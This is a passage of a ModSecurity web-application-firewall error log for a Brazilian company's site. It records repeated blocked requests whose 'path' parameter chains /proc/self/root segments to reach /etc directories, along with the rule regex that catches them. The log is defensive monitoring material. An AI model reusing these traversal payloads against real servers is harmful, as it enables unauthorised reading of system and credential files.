"abgke7ysWC90G-1nBrBEyQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:40:45.142303 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:48678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkfXjZBu2q05ozVU9XXQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:49.389822 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:37528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkgXbQATo66fKoS7xOlQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:50.665715 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:45760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkgnbQATo66fKoS7xOlgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:51.984458 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:45774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkg46lpbStxTqkSktruwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:57.516253 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:45788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkiZqj1wV0Si-OkeftsgAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:03.456074 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:45804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkj_9ocpUE4ed4uDzuvgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:08.161945 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:38820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgklJqj1wV0Si-OkeftuQAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:09.465427 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:38836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgklZqj1wV0Si-OkeftuwAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:24.272214 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:36608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkpAlT9VtDQc7bgUyxNgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:34.334290 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:55316] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkrnbQATo66fKoS7xOzgAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:37.755759 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:52244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgksXbQATo66fKoS7xO1gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:39.066208 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.243.203:52250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgks5qj1wV0Si-OkeftvwAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:41:41.448591 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.228.16:52748] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgktRXjF1vJNtV6CWr1SwAAAcw"]
[Mon Mar 16 12:41:47.736441 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:40886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgku5qj1wV0Si-OkeftxwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:06.179597 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:40894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkznbQATo66fKoS7xPBQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:09.648413 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:42062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgk0QlT9VtDQc7bgUyxXgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:11.995901 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:55996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgk0_9ocpUE4ed4uDzuyAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:15.384294 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:56002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgk1_9ocpUE4ed4uDzuzQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:22.755466 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:56004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgk3njZBu2q05ozVU9XcQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:42:25.155424 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.243.203:54160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgk4RXjF1vJNtV6CWr1YgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:43:14.283520 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:60910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglEnbQATo66fKoS7xPSwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:43:17.642933 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:39998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglFf9ocpUE4ed4uDzu2wAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
